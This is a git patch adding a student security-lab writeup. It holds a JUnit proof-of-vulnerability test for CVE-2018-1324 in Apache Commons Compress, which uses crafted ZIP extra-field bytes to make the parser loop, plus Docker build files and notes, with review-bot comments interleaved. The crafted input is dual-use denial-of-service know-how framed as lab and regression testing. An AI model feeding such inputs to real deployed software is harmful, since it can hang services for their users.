From e67fc55af30d6c1ac5be09783729c25d56911a6b Mon Sep 17 00:00:00 2001
From: Michael Chen
Date: Wed, 15 Jun 2022 19:58:23 +0200
Subject: [PATCH] Added lab 4 writeup (WIP)
---
 Exercise/Writeup/Lab 04/Dockerfile | 4 +++
 Exercise/Writeup/Lab 04/RCountLoopTest.java | 23 +++++++++++++++
 Exercise/Writeup/Lab 04/build.sh | 2 ++
 Exercise/Writeup/lab04.md | 32 +++++++++++++++++++++
 4 files changed, 61 insertions(+)
 create mode 100644 Exercise/Writeup/Lab 04/Dockerfile
 create mode 100644 Exercise/Writeup/Lab 04/RCountLoopTest.java
 create mode 100644 Exercise/Writeup/Lab 04/build.sh
 create mode 100644 Exercise/Writeup/lab04.md
diff --git a/Exercise/Writeup/Lab 04/Dockerfile b/Exercise/Writeup/Lab 04/Dockerfile
new file mode 100644
index 0000000..4e60243
--- /dev/null
+++ b/Exercise/Writeup/Lab 04/Dockerfile
@@ -0,0 +1,4 @@
+FROM bqcuongas/sselab:latest
+
+# Copy Task 3 Tests to Image
+COPY RCountLoopTest.java /SSE_LAB/CVE-2018-1324/src/test/java/org/apache/commons/compress/archivers/zip/
\ No newline at end of file
diff --git a/Exercise/Writeup/Lab 04/RCountLoopTest.java b/Exercise/Writeup/Lab 04/RCountLoopTest.java
new file mode 100644
index 0000000..f9b248b
--- /dev/null
+++ b/Exercise/Writeup/Lab 04/RCountLoopTest.java
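Review bot: `FROM bqcuongas/sselab:latest` pulls a mutable tag from a third-party Docker Hub account, so the environment the PoV is built into is not reproducible and can change underneath this repository without any commit here; pin the base, e.g. `FROM bqcuongas/sselab:<tag>@sha256:<digest>` with the digest taken from `docker image inspect` of the image the writeup was actually produced on. The COPY destination is consistent with the `package org.apache.commons.compress.archivers.zip` declaration of the copied test, which is what surefire needs, but a one-line comment stating that the target directory belongs to the vendored CVE-2018-1324 checkout inside the base image (`# test tree of the commons-compress checkout shipped in the base image`) would save the next reader from guessing where `/SSE_LAB/CVE-2018-1324` comes from.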
@@ -0,0 +1,23 @@
+package org.apache.commons.compress.archivers.zip;
+import org.junit.Test;
+
+public class RCountLoopTest {
+ @Test(timeout = 5000)
+ public void rCountLoopPoVTest() {
+ X0017_StrongEncryptionHeader header = new X0017_StrongEncryptionHeader();
+ byte[] data = {
+ /* [0] Format */ 0,0,
+ /* [2] Algorithm */ 0,0,
+ /* [4] Bitlen */ 0,0,
+ /* [6] Flags */ 0,0,
+ /* [8] RCount (Outer Loop) */ -1,-1,-1,-1,
+ /* [12] HashType */ 0,0,
+ /* [14] HashSize (inner loop) */ -1,-1
+ };
+ int offset = 0;
+ int length = 0;
+ // System.err.println(String.format("ZIP RCount is '%d'!", ZipLong.getValue(data, 8)));
+ // System.err.println(String.format("ZIP HashSize is '%d'!", ZipShort.getValue(data, 14)));
+ header.parseCentralDirectoryFormat(data, offset, length);
+ }
+}
\ No newline at end of file
diff --git a/Exercise/Writeup/Lab 04/build.sh b/Exercise/Writeup/Lab 04/build.sh
new file mode 100644
index 0000000..8d0833b
--- /dev/null
+++ b/Exercise/Writeup/Lab 04/build.sh
@@ -0,0 +1,2 @@
+#!/bin/sh -e
+docker build -f Dockerfile -t hub.cnml.de/sselab:latest .
\ No newline at end of file
diff --git a/Exercise/Writeup/lab04.md b/Exercise/Writeup/lab04.md
new file mode 100644
index 0000000..eba2f0f
--- /dev/null
+++ b/Exercise/Writeup/lab04.md
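Review bot: `int length = 0;` is handed to `parseCentralDirectoryFormat` although `data` holds 16 bytes, so the PoV only fires if the vulnerable parser ignores `length` and reads RCount/HashSize straight out of `data`; a patched parser that bounds its reads by `length` (the usual shape of a fix for this bug class) would presumably reject this input with an exception instead of returning, and the test would then fail on the fixed code as well, so it cannot double as a regression test — use `int length = data.length;` so that the only thing separating pass from fail is whether the call returns before the timeout. The two commented-out `System.err.println` lines are dead code and should be deleted rather than kept. The class carries no Javadoc, and a test with no assertion needs one: a header such as `/** PoV for CVE-2018-1324: an X0017 extra field with RCount = 0xFFFFFFFF and HashSize = 0xFFFF must not hang the parser; the @Test timeout is the assertion. */` explains why a timeout failure is the expected signal on unpatched code. Note also that the writeup added in this same commit runs `-Dtest=RCountLoopBug#rCountLoopPoVTest`, which does not match this class name `RCountLoopTest`, so the documented command would not select this test.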
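Review bot: The `-e` in `#!/bin/sh -e` only takes effect when the script is executed directly; invoked as `sh build.sh` the shebang options are ignored, so if this script ever grows a second command, put the option in the body instead: `#!/bin/sh` followed by `set -e`. The image is tagged `hub.cnml.de/sselab:latest`, a mutable tag; if it is pushed to that registry, adding a version or commit-hash tag alongside `latest` (`-t hub.cnml.de/sselab:$(git rev-parse --short HEAD)`) lets the writeup's results be tied to a specific image.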
@@ -0,0 +1,32 @@
+# Lab 4
+
+## Task 2
+
+The test that reveals the vulnerability is.
+
+```bash
+# Run the newly created PoV
+$ mvn test -e -Dtest=SupportDTDDefaultsTest#testDTDAttempt
+SupportDTDDefaultsTest.testDTDAttempt:20 Should not try to resolve external DTD subset: java.io.IOException: java.net.ConnectException: Connection refused (Connection refused)
+```
+
+After introducing the patch the PoV disappeared.
+
+## Task 3
+
+For this vulnerability we added additonal test that acts as a PoV to the docker image.
+
+```bash
+# Run all tests
+$ mvn test
+
+# Run only the newly created PoV
+$ mvn test -e -Dtest=RCountLoopBug#rCountLoopPoVTest
+RCountLoopTest.rCountLoopPoVTest:21 ยป TestTimedOut test timed out after 5000 m...
+```
+
+```bash
+# Re-apply patch (revert patch is staged)
+$ git restore --staged src/
+$ git restore src/
+```
\ No newline at end of file